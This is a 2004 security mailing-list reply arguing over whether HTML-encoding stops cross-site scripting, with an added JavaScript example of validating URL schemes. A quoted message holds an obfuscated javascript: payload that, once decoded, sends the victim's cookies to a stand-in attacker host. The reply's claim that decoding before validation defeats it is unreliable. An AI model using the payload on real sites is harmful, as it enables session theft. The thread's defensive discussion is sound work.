WebApp Sec mailing list archives
Re: [Re: AppSec FAQ at OWASP]
From: Rohyt Belani <rohytbelani () hotmail com>
Date: 30 Jan 2004 15:43:28 -0000
In-Reply-To: <02ca01c3e706$59b8f720$ec658009@pprados>
> An easier solution to prevent XSS attacks might be to HTML encode the "<" and ">" characters as &lt; and &gt;. So even if they are accepted as input from the user, it would not result in the execution of a script like <script>...</script>.

It's not correct. With this code:

    <a href="<%= escapeHTML(url)%>/doc.html">Document</a>

The hacker can inject into the variable url the value:

    javascript:eval(String.fromCharCode(60,115,99,114,105,112,116,62,110,101,119,32,73,109,97,103,101,40,41,46,115,114,99,61,34,104,116,116,112,58,47,47,112,105,114,97,116,101,46,111,114,103,47,118,111,108,101,99,111,111,107,105,101,46,106,115,112,63,99,61,34,43,101,115,99,97,112,101,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59,60,47,115,99,114,105,112,116,62))

and execute a script without <, > or &!

Phil
The solution I proposed for HTML encoding characters like < and > will still be effective in the case you mentioned. This is because the underlying principle for good input validation routines is to first decode the encoded URL and then perform input validation. By doing so, all encoding attacks like the one you mentioned can be prevented from executing successfully.
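An added example (not code from the thread) that shows the point of the exchange in JavaScript: HTML-encoding keeps the href attribute syntactically intact, but a javascript: URL contains no "<", ">" or "&" to encode, so a user-supplied href also needs a scheme allowlist before it goes into the template. The function names and the constructed test URLs are this example's own.

```javascript
// Attribute-safe HTML encoding: "&" and both quote characters matter inside
// an attribute value, not only "<" and ">".
function escapeHTML(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// The template from the thread: encoding only, no check on the URL itself.
function renderLinkEncodedOnly(url) {
  return `<a href="${escapeHTML(url)}/doc.html">Document</a>`;
}

// Decide whether a user-supplied value may be used as an href at all.
// Only http, https and relative URLs are allowed; every other scheme
// (javascript:, data:, vbscript:, ...) is rejected. The normalisation mirrors
// what browsers do before reading the scheme: strip leading/trailing C0
// controls and spaces, then drop every tab, LF and CR, and compare
// case-insensitively, so " JaVaScRiPt:" and "java\tscript:" are caught too.
function isSafeHref(url) {
  const s = String(url)
    .replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, "")
    .replace(/[\t\n\r]/g, "");
  const m = /^([a-z][a-z0-9+.\-]*):/i.exec(s);
  if (!m) return true; // no scheme: a relative URL, which cannot run script
  const scheme = m[1].toLowerCase();
  return scheme === "http" || scheme === "https";
}

// Scheme check first, attribute encoding second; rejected URLs become an
// inert fragment link instead of being rendered.
function renderLinkValidated(url) {
  const safe = isSafeHref(url) ? url : "#";
  return `<a href="${escapeHTML(safe)}/doc.html">Document</a>`;
}
```

The quote escaping in renderLinkValidated is still required: an http URL that contains a double quote would otherwise break out of the attribute even though it passes the scheme check.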
Current thread:
- Re: [Re: AppSec FAQ at OWASP] Sangita Pakala (Jan 29)
- Re: [Re: AppSec FAQ at OWASP] Omar Ismail (Jan 29)
- <Possible follow-ups>
- Re: [Re: AppSec FAQ at OWASP] Rohyt Belani (Jan 29)
- Re: [Re: AppSec FAQ at OWASP] Philippe P. (Jan 30)
- Re: [Re: AppSec FAQ at OWASP] Philippe Prados (Jan 30)
- Re: [Re: AppSec FAQ at OWASP] Ulf Härnhammar (Jan 30)
- Re: [Re: AppSec FAQ at OWASP] Omarjan Ismail (Jan 29)
- Re: [Re: AppSec FAQ at OWASP] Rohyt Belani (Jan 30)